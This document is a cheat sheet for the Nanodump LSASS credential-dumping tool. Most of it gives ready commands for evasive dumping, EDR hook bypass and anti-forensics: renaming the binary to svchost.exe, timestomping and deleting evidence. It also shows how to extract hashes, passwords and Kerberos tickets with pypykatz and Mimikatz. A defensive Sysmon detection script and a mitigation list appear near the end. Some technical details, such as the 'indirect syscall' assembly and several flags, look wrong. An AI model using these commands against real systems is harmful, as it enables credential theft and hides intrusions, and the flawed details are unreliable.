Nanodump
Nanodump is an advanced LSASS dumping utility designed to evade detection by using process forking, handle duplication, and minimal Windows API calls.
Installation
```shell
# Download a precompiled binary from the releases page:
# https://github.com/fortra/nanodump/releases

# Or compile from source (Visual Studio)
git clone https://github.com/fortra/nanodump.git
cd nanodump
# Open nanodump.sln and build
```
Basic Usage
| Command | Description |
|---|---|
| `nanodump.exe --write output.dmp` | Dump LSASS to file |
| `nanodump.exe --write output.dmp --fork` | Fork LSASS before dumping |
| `nanodump.exe --write output.dmp --dup` | Duplicate handle to LSASS |
| `nanodump.exe --help` | Display help menu |
| `nanodump.exe --silent` | Silent mode (minimal output) |
Evasion Techniques
Process Forking (--fork)
```cmd
REM Fork LSASS into a separate process before dumping
nanodump.exe --write output.dmp --fork
```
Advantages:
- Original LSASS process unaffected
- Harder to detect with process monitoring
- Can dump the original process while it keeps running
Handle Duplication (--dup)
```cmd
REM Duplicate an existing LSASS handle instead of opening LSASS directly
nanodump.exe --write output.dmp --dup
```
Advantages:
- Fewer direct API calls to LSASS
- Avoids calling OpenProcess on LSASS
- Evades behavioral detection
Indirect API Calls
Nanodump uses indirect syscalls to minimize detection and bypass EDR hooks on common APIs:
- OpenProcess
- MiniDumpWriteDump
- VirtualQuery
- ReadProcessMemory
LSASS Clone (--fork combined)
```cmd
REM Optimal evasion: fork, then work on the clone
nanodump.exe --write output.dmp --fork
REM Creates a suspended fork and reads its memory directly;
REM the original LSASS process is never opened directly
```
Dump Modes
Standard Dump
```cmd
REM Basic minidump of LSASS
nanodump.exe --write lsass.dmp
REM Creates a full minidump file usable with:
REM - pypykatz
REM - Mimikatz
REM - Volatility
```
Silent Dump
```cmd
REM Minimal output, no console spam
nanodump.exe --write lsass.dmp --silent
REM Reduces the detection surface by avoiding console I/O
```
Fork Dump
```cmd
REM Create a fork of LSASS before dumping
nanodump.exe --write lsass.dmp --fork
```
The process tree then shows:
```
LSASS (original, still running)
└─ LSASS (clone, created by nanodump)
```
Advanced Options
Handle Duplication
```cmd
REM Duplicate an existing LSASS handle
REM Requires an existing handle (e.g., held by another process)
nanodump.exe --write lsass.dmp --dup
REM Lower privilege requirements than a direct OpenProcess
```
Memory Region Selection
```cmd
REM Dump specific memory regions
nanodump.exe --write lsass.dmp --region 0x140000000
```
Useful for:
- Targeted credential extraction
- Reducing file size
- Avoiding unnecessary data
Output Formats
```cmd
REM Different minidump types
nanodump.exe --write lsass.dmp --type full
nanodump.exe --write lsass.dmp --type normal
nanodump.exe --write lsass.dmp --type lite
```
- Full: maximum data, larger file
- Normal: standard minidump format
- Lite: minimal viable dump
Evasion Techniques Breakdown
Avoiding MiniDumpWriteDump Hook
Traditional approach:
1. OpenProcess(LSASS)
2. CreateFileA/W (for output file)
3. MiniDumpWriteDump (hooked by EDR)
4. CloseHandle
Nanodump approach:
1. Use RtlCopyMemory/memcpy directly
2. Construct dump manually
3. Bypass MiniDumpWriteDump entirely
Indirect Syscalls
Direct syscalls:
```asm
mov rax, 0x0A ; NtOpenProcess
syscall
```
Indirect syscalls (via function pointers):
```asm
lea rax, [kernel32.OpenProcess]
call rax
```
Nanodump locates the syscall stubs through the PEB rather than through its import table, so hooks placed on imported functions are never triggered.
PEB Walking
1. Read TEB (Thread Environment Block)
2. Follow to PEB (Process Environment Block)
3. Access ntdll exports directly
4. Call syscalls without imported functions
5. Bypasses all import-based hooks
Operational Security
Avoiding Detection
```cmd
REM Rename the executable
ren nanodump.exe svchost.exe
svchost.exe --write output.dmp --fork

REM Use a legitimate directory
copy nanodump.exe %WINDIR%\Temp\nanodump.exe
cd %WINDIR%\Temp
nanodump.exe --write output.dmp --fork

REM Clean up
del nanodump.exe output.dmp
```
Timestomp Output
```cmd
REM Change file timestamps to blend in, using Windows built-in utilities
powershell Set-ItemProperty -Path output.dmp -Name CreationTime -Value (Get-Date -Date "2020-01-01")
```
Memory Wiping
- After dumping, consider wiping
- The original LSASS memory is still accessible
- Securing the dump file is the attacker's responsibility
Post-Exploitation
Parse with Pypykatz
```shell
# Convert the dump to credentials
pypykatz lsa minidump output.dmp
```
Extracts:
- NTLM hashes
- Plaintext passwords
- Kerberos tickets
- Session keys
Use with Mimikatz
```
mimikatz # sekurlsa::minidump output.dmp
mimikatz # sekurlsa::logonPasswords
```
Volatility Analysis
```shell
# Analyze the dump with Volatility
python vol.py -f output.dmp --profile=Win10x64 lsadump
# Identifies kernel structures and credentials
```
Comparison with Other Tools
| Feature | Nanodump | Mimikatz | Pypykatz | Procdump |
|---|---|---|---|---|
| Indirect Syscalls | Yes | No | No | No |
| Process Forking | Yes | No | No | No |
| Handle Duplication | Yes | No | No | No |
| Standalone Binary | Yes | Yes | No | Yes |
| Python Based | No | No | Yes | No |
| EDR Evasion | Excellent | Poor | Good | Poor |
Detection and Mitigation
Detection Methods
Monitor for LSASS dump attempts:
- Suspicious OpenProcess calls to LSASS
- MiniDumpWriteDump API calls
- Indirect syscall usage
- File writes from the LSASS memory region
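As an added example (not part of this cheat sheet or the Nanodump project), the Python below applies the first three checks to Sysmon Event ID 10 (ProcessAccess) records. It flags any non-allowlisted process that obtains a handle to lsass.exe carrying rights that are sufficient to read its memory (PROCESS_VM_READ), clone it (PROCESS_CREATE_PROCESS, which the fork technique still has to request) or duplicate handles from it (PROCESS_DUP_HANDLE), and it notes when the recorded CallTrace does not begin in ntdll.dll, which is how a syscall issued outside ntdll shows up. The sample records, the allowlist and every source path are constructed for the example; the access-right values are the documented Win32 constants.

```python
"""Flag suspicious handle acquisitions on lsass.exe in Sysmon Event ID 10 records."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Win32 process access rights (documented PROCESS_* constants).
PROCESS_VM_READ = 0x0010          # read memory: needed for any dump
PROCESS_DUP_HANDLE = 0x0040       # duplicate handles out of the process
PROCESS_CREATE_PROCESS = 0x0080   # fork/clone the process

# Any one of these rights on lsass.exe is worth an alert; the name becomes the reason.
DUMP_RIGHTS = {
    PROCESS_VM_READ: "VM_READ",
    PROCESS_DUP_HANDLE: "DUP_HANDLE",
    PROCESS_CREATE_PROCESS: "CREATE_PROCESS",
}

# Processes that legitimately hold broad handles to LSASS on a stock install.
# Assumed baseline for this example; tune it to your own fleet.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}


@dataclass
class Alert:
    source_image: str
    granted_access: int
    reasons: List[str] = field(default_factory=list)


def parse_event(body: str) -> Dict[str, str]:
    """Parse the 'Key: value' lines of a Sysmon Event ID 10 message body."""
    fields: Dict[str, str] = {}
    for line in body.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def first_frame_module(call_trace: str) -> str:
    """Module of the innermost CallTrace frame: 'ntdll.dll' for a normal API call,
    the caller's own image or UNKNOWN(...) when the syscall was issued elsewhere."""
    first = call_trace.split("|", 1)[0]
    module_path = first.split("+", 1)[0]
    return module_path.rsplit("\\", 1)[-1].lower()


def assess(fields: Dict[str, str]) -> Optional[Alert]:
    """Return an Alert if this ProcessAccess record looks like an LSASS dump attempt."""
    target = fields.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
    if target != "lsass.exe":
        return None
    source = fields.get("SourceImage", "")
    if source.lower() in ALLOWLIST:
        return None
    granted = int(fields.get("GrantedAccess", "0"), 16)
    reasons = [name for bit, name in DUMP_RIGHTS.items() if granted & bit]
    if not reasons:
        return None  # e.g. QUERY_LIMITED_INFORMATION alone, as inventory tools request
    if first_frame_module(fields.get("CallTrace", "")) != "ntdll.dll":
        reasons.append("syscall not issued from ntdll")
    return Alert(source, granted, reasons)


def find_lsass_access(bodies: List[str]) -> List[Alert]:
    """Run the check over a batch of event bodies and return the hits in order."""
    hits = []
    for body in bodies:
        alert = assess(parse_event(body))
        if alert:
            hits.append(alert)
    return hits


# Constructed sample records (not real telemetry) in the text form Sysmon writes.
SAMPLE_EVENTS = [
    # csrss.exe holds a full-access handle by design: allowlisted, no alert.
    "Process accessed:\nUtcTime: 2025-03-01 10:00:01.000\n"
    r"SourceImage: C:\Windows\System32\csrss.exe" "\n"
    r"TargetImage: C:\Windows\System32\lsass.exe" "\n"
    "GrantedAccess: 0x1FFFFF\n"
    r"CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4b4|C:\Windows\System32\KERNELBASE.dll+2c5ce",
    # Renamed binary in a user profile reads LSASS memory; call trace not rooted in ntdll.
    "Process accessed:\nUtcTime: 2025-03-01 10:05:12.000\n"
    r"SourceImage: C:\Users\alice\Downloads\svchost.exe" "\n"
    r"TargetImage: C:\Windows\System32\lsass.exe" "\n"
    "GrantedAccess: 0x1010\n"
    r"CallTrace: UNKNOWN(00007FF6A1B22C10)|C:\Users\alice\Downloads\svchost.exe+3f2a",
    # Fork-style access: only PROCESS_CREATE_PROCESS requested, through the normal ntdll path.
    "Process accessed:\nUtcTime: 2025-03-01 10:06:40.000\n"
    r"SourceImage: C:\Users\alice\Downloads\nd.exe" "\n"
    r"TargetImage: C:\Windows\System32\lsass.exe" "\n"
    "GrantedAccess: 0x0080\n"
    r"CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4b4|C:\Windows\System32\KERNELBASE.dll+2c5ce",
    # Query-only access to LSASS: below threshold, no alert.
    "Process accessed:\nUtcTime: 2025-03-01 10:07:03.000\n"
    r"SourceImage: C:\Windows\System32\tasklist.exe" "\n"
    r"TargetImage: C:\Windows\System32\lsass.exe" "\n"
    "GrantedAccess: 0x1000\n"
    r"CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4b4",
]

if __name__ == "__main__":
    for alert in find_lsass_access(SAMPLE_EVENTS):
        print(f"{alert.source_image} -> lsass.exe 0x{alert.granted_access:X}: {', '.join(alert.reasons)}")
```

Feeding real Sysmon exports in, the two signals worth tuning are the allowlist (build it from a baseline of which images open LSASS on your own hosts) and the CallTrace check, which catches the indirect-syscall style this sheet describes even when the requested access mask looks ordinary.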
Mitigation Strategies
1. Enable Windows Defender Credential Guard
2. Implement LSA protection (Registry DWORD: RunAsPPL = 1)
3. Deploy EDR with advanced behavioral detection
4. Monitor for LSASS access and memory dumps
5. Implement attack surface reduction rules
6. Restrict local admin access
Command Line Examples
Full Evasion Dump
```cmd
REM Maximum evasion technique usage
nanodump.exe --write %TEMP%\~tmp.dmp --fork --silent
REM Then extract credentials
pypykatz lsa minidump %TEMP%\~tmp.dmp
```
Targeted Dump
```cmd
REM Dump only authentication packages
nanodump.exe --write auth.dmp --region 0x140000000
```
Scheduled Dumping
```cmd
REM Dump and clean up via batch script
@echo off
nanodump.exe --write lsass.dmp --fork --silent
timeout /t 5
del nanodump.exe
```
References and Further Reading
Related Tools
- Dumpert: LSASS dumping with syscalls
- Outflank-Dumpert: Similar approach with additional evasion
- PPLFault: LSASS protection bypass
- Pypykatz: Credential parsing
- Mimikatz: Original credential extraction framework
Last updated: March 2025